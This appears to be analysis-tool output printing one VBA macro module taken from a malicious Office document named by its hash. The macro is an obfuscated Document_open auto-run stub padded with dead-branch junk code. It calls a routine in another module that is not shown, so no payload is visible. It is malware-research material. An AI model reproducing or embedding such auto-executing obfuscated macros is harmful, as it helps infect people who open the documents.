Filename     : ./macros/23f4a774007e2fc64a2824e5973bb695a64667d8d832fbc29806976dad67d7f7
OLE stream   : Macros/VBA/Rrnkggawcl
VBA filename : Rrnkggawcl.cls
----------------------------------------
Attribute VB_Name = "Rrnkggawcl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
Egpbylvxqipix.Yrqknupbgzkjl
End Sub
